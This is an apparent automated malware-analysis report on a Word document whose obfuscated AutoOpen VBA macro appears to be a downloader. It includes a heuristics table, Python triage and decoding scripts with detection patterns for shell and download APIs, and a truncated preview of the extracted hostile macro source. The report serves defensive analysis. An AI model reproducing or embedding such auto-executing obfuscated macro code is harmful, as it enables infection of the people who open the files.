Verdict: MALICIOUS
Risk score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample carries a VBA project whose AutoOpen subroutine runs as soon as the document is opened. AutoOpen decodes an obfuscated string literal through a custom routine (vZcCKRooQWIXQ) and hands the result, together with a long key-like literal, to a second routine; the same project contains CreateObject and Shell() calls. That combination is the usual shape of a macro downloader that fetches and executes a second-stage payload. The ClamAV signature Doc.Macro.Obfuscated-6397052-2 corroborates the verdict.
Heuristics (8)

| Finding | Severity | Rule | Description |
|---|---|---|---|
| ClamAV: Doc.Macro.Obfuscated-6397052-2 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (4 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). |

Notes on reading the table:

- The only extracted URL is the DrawingML XML namespace identifier that Office writes into any document containing drawing markup. It is not a network indicator; the macro's download target sits inside the obfuscated literals, not in the URL list.
- The WordBasic row's description ("no modern VBA project was recovered") is the rule's generic text and conflicts with the artifact below, where the full VBA project was extracted as macros.bas. Read that row as the AutoOpen name surfacing in the legacy-stream check, not as independent evidence.
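How rules like OLE_VBA_AUTOOPEN, OLE_VBA_SHELL and OLE_VBA_CREATEOBJ fall out of extracted source can be shown with a small token scan. The following Python is an added example, not the analyzer's or ClamAV's logic: its regexes, the rule names beyond the three listed above, and the severity ladder are this example's own approximations. The input is a constructed excerpt of the macro preview further down plus a three-line Sub with a Shell() call invented here to exercise that check (the sample's real Shell() call lies beyond the preview). Besides the token rules it counts the dead-loop idiom (While a < b / b = b - a / Wend) and the long random identifiers that make the sample read as obfuscated.

```python
"""Token-level triage of extracted VBA source.

Added example, not the analyzer's or ClamAV's rules: the patterns, the
extra rule names and the severity ladder are this example's own.
"""
import re

# Constructed input: an excerpt of the macro preview plus a Sub with a
# Shell() call that is NOT in the preview (added here to exercise the check).
SAMPLE = '''Attribute VB_Name = "sQYppTLCotAOVAwKmGl"
Sub AutoOpen()
Dim HCUgCTrhEczyc As String: HCUgCTrhEczyc = vZcCKRooQWIXQ("Dh4HEVNARQIbAARSRRNuRjVDb1AiV3IcH1dLEQ==")
lkSAYFPjAlGgNC.TWROvqCvkFAHOVAr (wcVrOCpLBDRplrHiCF(HCUgCTrhEczyc, "fjsaiojgiower$@)G$@)G"))
End Sub
Public Function BGcqSbFvoloBXHiypb(rtpQWcmioKTUTPcl As String) As Object
Set BGcqSbFvoloBXHiypb = VBA.CreateObject(rtpQWcmioKTUTPcl)
End Function
Public Function vZcCKRooQWIXQ(NGcYeSWwqWBUNwD As String, Optional BZuLpbNVRTvRFfWqC As Boolean = True) As String
Dim NlXweQQqSCdL, vVHBAmCtGSP As Integer
NlXweQQqSCdL = 1
vVHBAmCtGSP = 85
While NlXweQQqSCdL < vVHBAmCtGSP
vVHBAmCtGSP = vVHBAmCtGSP - NlXweQQqSCdL
Wend
If FQggOPPsTVKAtXJEF < Len(Application.UserName) Then
End If
End Function
Sub Run2()
Call Shell(sPath, vbHide)
End Sub
'''

# Auto-execution entry points (Word and Excel names that run without a click).
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+(AutoOpen|AutoExec|AutoClose|AutoNew|"
    r"Document_Open|Document_Close|Workbook_Open|Auto_Open)\s*\(", re.I | re.M)
# Execution / download / evasion tokens. Searched in the raw source on purpose:
# obfuscated macros often carry API names inside string literals.
TOKEN_RES = {
    "OLE_VBA_SHELL": re.compile(r"\bShell\s*\(", re.I),
    "OLE_VBA_CREATEOBJ": re.compile(r"\bCreateObject\s*\(", re.I),
    "WSCRIPT_SHELL": re.compile(r"\bWScript\.Shell\b", re.I),
    "DOWNLOAD_API": re.compile(r"URLDownloadToFile|XMLHTTP|WinHttpRequest|ADODB\.Stream", re.I),
    "USERNAME_CHECK": re.compile(r"Application\.UserName", re.I),
}
# Dead-loop idiom repeated throughout the decoder: While a < b / b = b - a / Wend
JUNK_LOOP_RE = re.compile(
    r"While\s+(\w+)\s*<\s*(\w+)\s*\r?\n\s*\2\s*=\s*\2\s*-\s*\1\s*\r?\n\s*Wend", re.I)
IDENT_RE = re.compile(r"\b[A-Za-z_]\w{11,}\b")
VBA_WORDS = {"CreateObject", "Application", "Collection", "Attribute"}


def strip_strings(src):
    """Blank out string literals so their contents are not counted as identifiers."""
    return re.sub(r'"[^"\n]*"', '""', src)


def long_identifiers(src):
    """Identifiers of 12+ characters outside string literals, minus known VBA names."""
    names = {m.group(0) for m in IDENT_RE.finditer(strip_strings(src))}
    return sorted(n for n in names if n not in VBA_WORDS and not n.startswith("VB_"))


def triage(src):
    """Summarise auto-exec entry points, execution tokens and obfuscation signals."""
    report = {
        "autoexec": [m.group(1) for m in AUTOEXEC_RE.finditer(src)],
        "exec_tokens": [name for name, rx in TOKEN_RES.items() if rx.search(src)],
        "junk_loops": sum(1 for _ in JUNK_LOOP_RE.finditer(src)),
        "long_identifiers": long_identifiers(src),
    }
    report["obfuscated"] = report["junk_loops"] > 0 or len(report["long_identifiers"]) >= 5
    if report["autoexec"] and "OLE_VBA_SHELL" in report["exec_tokens"]:
        report["severity"] = "critical"      # auto-run straight into a shell call
    elif report["autoexec"] and report["exec_tokens"]:
        report["severity"] = "high"
    elif report["autoexec"] or report["exec_tokens"]:
        report["severity"] = "medium"
    else:
        report["severity"] = "info"
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The token rules alone would also fire on a benign macro that shells out to a helper, which is why the analyzer stacks them with the auto-exec rule and the obfuscation signals; the ladder above mirrors that stacking, so a lone CreateObject in a hand-written macro stays at medium.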
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 68616 bytes | fc4833fdda3ee8381c645d2dce45ad2fb53a4befb730cf36d96c1f95fc8e3f77 |
Script preview (first 1,000 lines of the extracted script; truncated further below). olevba concatenates two modules here: ThisDocument, which carries attributes only, and a standard module named sQYppTLCotAOVAwKmGl that holds AutoOpen and the decoder.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sQYppTLCotAOVAwKmGl"
Sub AutoOpen()
Dim HCUgCTrhEczyc As String: HCUgCTrhEczyc = vZcCKRooQWIXQ("Dh4HEVNARQIbAARSRRNuRjVDb1AiV3IcH1dLEQ==")
lkSAYFPjAlGgNC.TWROvqCvkFAHOVAr (wcVrOCpLBDRplrHiCF(HCUgCTrhEczyc, "fjsaiojgiower$@)G$@)G$@(123tu89013tT*$T@()!#T)$T(RGIWKWEPEQF{fg]erpj;lksdf8924otgERGIW#*@#($TR(W@GUWG(@#RIDSJVXDASUIT("))
End Sub
Public Function BGcqSbFvoloBXHiypb(rtpQWcmioKTUTPcl As String) As Object
Dim ZigsemUogdi As Collection
Set ZigsemUogdi = New Collection
ZigsemUogdi.Add "RmwOZOnjESHlvc"
ZigsemUogdi.Add "QDKUHdTxGROAu"
ZigsemUogdi.Add "YCzAMXnKtoyRTdLVtZ"
ZigsemUogdi.Add "QqafkRvpSEhPOzhu"
ZigsemUogdi.Add "MEJmbCkDzRkVx"
ZigsemUogdi.Add "OXEvDisOFFcZpZZfML"
Set BGcqSbFvoloBXHiypb = VBA.CreateObject(rtpQWcmioKTUTPcl)
End Function
Public Function vZcCKRooQWIXQ(NGcYeSWwqWBUNwD As String, Optional BZuLpbNVRTvRFfWqC As Boolean = True) As String
Dim opBjnkOoToAkISbpj: opBjnkOoToAkISbpj = Array("dKiXtkcrdklxGA""ALEDuYGyRqNuHXrLbRa""RksJvkjGOPN""CMayGoumLSPnq""JIcbsOQwSpKtATfKM""lJyKCozjsLzjceD""zgDgfJTSspek")
Static RccTfUsvMmURR(0 To 255) As Byte
Dim DXTtYIiqTgBZHdSyqk As Collection
Set DXTtYIiqTgBZHdSyqk = New Collection
DXTtYIiqTgBZHdSyqk.Add "FaikxNQgSOwpoSU"
DXTtYIiqTgBZHdSyqk.Add "UagowtNOEUwKEpO"
DXTtYIiqTgBZHdSyqk.Add "aAwaDQApOYxijUEFo"
DXTtYIiqTgBZHdSyqk.Add "vpVwtHfGalhhSp"
Dim buPbuROcYYqlTRMZTlB() As Byte, fLmmaqidsaJlpt() As Byte
Dim rAIEZYgbWBzdjKMN As Integer
rAIEZYgbWBzdjKMN = 9 * 1
Dim HeRwylAyEIduC As Long, FXuYECZFqhd As Long
Dim NlXweQQqSCdL, vVHBAmCtGSP As Integer
NlXweQQqSCdL = 1
vVHBAmCtGSP = 85
While NlXweQQqSCdL < vVHBAmCtGSP
vVHBAmCtGSP = vVHBAmCtGSP - NlXweQQqSCdL
Wend
If RccTfUsvMmURR(0) = 0 Then
Dim ZrAODEQFQway, mStdFGRwygEeBiMv As Integer
For mStdFGRwygEeBiMv = 0 To 3
ZrAODEQFQway = ZrAODEQFQway + mStdFGRwygEeBiMv
Next mStdFGRwygEeBiMv
For HeRwylAyEIduC = 0 To 255
Dim FQggOPPsTVKAtXJEF, eobvNqmqpromJvij As Integer
FQggOPPsTVKAtXJEF = 7
eobvNqmqpromJvij = 66
While FQggOPPsTVKAtXJEF < eobvNqmqpromJvij
eobvNqmqpromJvij = eobvNqmqpromJvij - FQggOPPsTVKAtXJEF
Wend
RccTfUsvMmURR(HeRwylAyEIduC) = 255
Dim OazgVwCeYaGNc, BdPhbCCpnagdwgN As Integer
For BdPhbCCpnagdwgN = 0 To 1
OazgVwCeYaGNc = OazgVwCeYaGNc + BdPhbCCpnagdwgN
Next BdPhbCCpnagdwgN
Next HeRwylAyEIduC
Dim uEgAaqicFIEkRtUUf As Integer
uEgAaqicFIEkRtUUf = 4
Dim KxmmnhOHnRijyIebyw As Integer
KxmmnhOHnRijyIebyw = 2 - 7 * 1
If uEgAaqicFIEkRtUUf < Len(Application.UserName) Then
Dim docfnnfbfVTivvvxaSB, QeGsWglCEBPrOtm As Integer
For QeGsWglCEBPrOtm = 0 To 6
docfnnfbfVTivvvxaSB = docfnnfbfVTivvvxaSB + QeGsWglCEBPrOtm
Next QeGsWglCEBPrOtm
Dim bCKZuMsnGSlzAfxMW As Variant
End If
For HeRwylAyEIduC = 0 To 25
Dim ipZPaJOBTXkpFaIW, qSwENNFCmBNHFicRvtb As Integer
ipZPaJOBTXkpFaIW = 5
qSwENNFCmBNHFicRvtb = 38
While ipZPaJOBTXkpFaIW < qSwENNFCmBNHFicRvtb
qSwENNFCmBNHFicRvtb = qSwENNFCmBNHFicRvtb - ipZPaJOBTXkpFaIW
Wend
RccTfUsvMmURR(HeRwylAyEIduC + 65) = HeRwylAyEIduC
Dim GWHavjycgvwwKUoFs, ofokysBifkgminNBAGa As Integer
For ofokysBifkgminNBAGa = 0 To 7
GWHavjycgvwwKUoFs = GWHavjycgvwwKUoFs + ofokysBifkgminNBAGa
Next ofokysBifkgminNBAGa
Next HeRwylAyEIduC
Dim yXiAKOAgsuGslosdFu: yXiAKOAgsuGslosdFu = Array("xQdUkmGApdDMHyxugPJ")
For HeRwylAyEIduC = 26 To 51
Dim InbBscmMxAhyu, OAeXlNNEHKnsUxk As Integer
For OAeXlNNEHKnsUxk = 0 To 2
InbBscmMxAhyu = InbBscmMxAhyu + OAeXlNNEHKnsUxk
Next OAeXlNNEHKnsUxk
RccTfUsvMmURR(HeRwylAyEIduC + 71) = HeRwylAyEIduC
Dim fnLDlNKYeZCv As Integer
fnLDlNKYeZCv = 9
Dim bmVyHktIzDBxfrPfEC: bmVyHktIzDBxfrPfEC = Array("ZBiaBMykZIo""zVMGqpzbAyw""DkHWnbHezLNEsjhZj""VzLCiuuAnZqFXzr""txmrEggyeoKuA""IxHlHmSVWfZQAcQL""OgZupMyAuwxPfxvqFrM")
If fnLDlNKYeZCv < Len(Application.UserName) Then
Dim PLWHCnzTGPrKtwaJL As Collection
Set PLWHCnzTGPrKtwa
... (truncated)
```
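What the AutoOpen call chain does can be checked statically, without running the macro. The following Python is an added example (not the analyzer's code and not part of the sample): it rebuilds the 256-entry byte table exactly as the visible loops in vZcCKRooQWIXQ fill it, confirms that the table is the standard base64 alphabet, and decodes the literal passed from AutoOpen with it. Two things are assumptions and are marked as such in the code: the preview is cut off before the table entries for the digits, '+' and '/', so those are filled in as standard base64; and the body of wcVrOCpLBDRplrHiCF is not in the preview, so treating it as a repeating-key XOR with the long literal from AutoOpen is a hypothesis, accepted only if the output is printable ASCII. The dead loops (While a < b / b = b - a / Wend), the throwaway Collection objects and the Len(Application.UserName) branches in the preview never touch the table; they are padding and can be ignored.

```python
"""Reconstruct the string decoding behind the AutoOpen macro.

Added example: not the analyzer's code and not part of the sample.
ASSUMPTIONS (not shown in the preview):
  * the decode table for '0'..'9', '+' and '/' follows standard base64
    (the preview stops inside the 'a'..'z' loop);
  * wcVrOCpLBDRplrHiCF is a repeating-key XOR with its second argument.
"""
import base64

# Literals copied verbatim from the AutoOpen routine in the preview.
ENCODED = "Dh4HEVNARQIbAARSRRNuRjVDb1AiV3IcH1dLEQ=="
KEY = ("fjsaiojgiower$@)G$@)G$@(123tu89013tT*$T@()!#T)$T(RGIWKWEPEQF{fg]erpj;"
       "lksdf8924otgERGIW#*@#($TR(W@GUWG(@#RIDSJVXDASUIT(")
STD_ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz"
                "0123456789+/")


def build_table():
    """Rebuild RccTfUsvMmURR(0 To 255) the way vZcCKRooQWIXQ fills it."""
    table = [255] * 256                 # For i = 0 To 255: tbl(i) = 255
    for i in range(0, 26):              # For i = 0 To 25: tbl(i + 65) = i  ('A'..'Z')
        table[i + 65] = i
    for i in range(26, 52):             # For i = 26 To 51: tbl(i + 71) = i ('a'..'z')
        table[i + 71] = i
    # ASSUMED continuation (truncated in the preview): digits, '+' and '/'.
    for i in range(52, 62):
        table[ord("0") + i - 52] = i
    table[ord("+")] = 62
    table[ord("/")] = 63
    return table


def table_is_standard_base64(table):
    """True if every alphabet character maps to its standard base64 value."""
    return all(table[ord(c)] == v for v, c in enumerate(STD_ALPHABET))


def decode_with_table(s, table):
    """Table-driven base64 decode: 6 bits per symbol, stop at '=' padding."""
    bits = nbits = 0
    out = bytearray()
    for ch in s:
        if ch == "=":
            break
        v = table[ord(ch)] if ord(ch) < 256 else 255
        if v == 255:
            raise ValueError("character %r is outside the decode table" % ch)
        bits = (bits << 6) | v
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((bits >> nbits) & 0xFF)
            bits &= (1 << nbits) - 1
    return bytes(out)


def decode_stage_one(s=ENCODED):
    """The part of the pipeline the preview shows: custom-table base64."""
    return decode_with_table(s, build_table())


def matches_stdlib(s=ENCODED):
    """Cross-check the rebuilt decoder against Python's base64 module."""
    return decode_stage_one(s) == base64.b64decode(s)


def xor_repeating_key(data, key):
    """HYPOTHESISED second stage (wcVrOCpLBDRplrHiCF body not in the preview)."""
    k = key.encode("latin-1")
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data))


def decode_stage_two(s=ENCODED, key=KEY):
    """Return the XOR output only if it is printable ASCII, else None.

    Printability is the acceptance test for the XOR hypothesis: a wrong
    key or a wrong algorithm yields control bytes, not a clean string.
    """
    raw = xor_repeating_key(decode_stage_one(s), key)
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


if __name__ == "__main__":
    print("table is standard base64:", table_is_standard_base64(build_table()))
    print("stage one (hex):", decode_stage_one().hex())
    print("stage two:", decode_stage_two())
```

Run it and compare the stage-two output with the arguments reaching Shell() and CreateObject in the full macros.bas before recording anything as an indicator: a printable result confirms the XOR hypothesis, while None means the second routine does something other than XOR and needs to be read from the rest of the source.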